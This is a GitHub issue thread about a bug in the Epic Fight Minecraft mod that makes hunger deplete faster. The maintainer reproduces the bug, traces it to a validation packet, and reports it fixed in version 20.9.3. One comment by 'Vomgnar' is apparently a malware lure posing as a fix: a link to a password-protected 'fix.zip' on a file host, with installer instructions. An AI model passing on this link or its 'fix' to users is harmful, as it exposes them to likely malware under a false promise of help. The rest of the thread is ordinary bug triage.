### ISSUE TITLE
[Bug|Crash]: Hunger is depleting much faster with Epic fight installed

### ISSUE THREAD

**Issue by Razor235T** [Yesssssman/epicfightmod#1784] opened 2024-08-28 05:30 UTC
### Please check if a similar issue has already been reported.

- [X] I checked this type of issue has never been reported.

### Please check you're using proper versions.

- [X] I checked all of them in the right version.

### Please check if this issue's from out of our area

- [X] I understood the problem.

### After all of these, please check if you're just pressing the ok buttons to skip this process.

- [X] I read the checklist and I promise I'll provide all the information that is needed to fix the issue

### Minecraft Version

1.20.1

### The Issue

Hunger is going down way faster than without Epic fight installed. It can be checked with Appleskin mod installed, which shows the saturation bar as well.

### Steps to Reproduce

Join minecraft world with Appleskin and Epic fight last versions installed on Minecraft Forge 47.3.5 and watch the saturation bar inside the hunger bar going way faster when sprinting than if not using Epic fight mod. I am not sprinting in armor nor have items in inventory, if it could impact my character's weight stats. Fresh world with fresh inventory with no other mods than Epic fight and Appleskin

**Comment by Vomgnar** [comment] 2024-08-28 05:30
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by guivnf** [comment] 2024-08-31 01:15
If you could attach a video comparing the two, it'd be of great help, as we can't spot any differences

**Comment by Yesssssman** [comment] 2024-08-31 02:30
No worry, I succeeded at reproducing this bug on my end and it was because validation packet for player input.

**Comment by Yesssssman** [comment] 2024-10-13 10:25
Fixed in 20.9.3

**Closed as completed by Yesssssman** 2024-10-13 10:25 UTC
Labels: solved
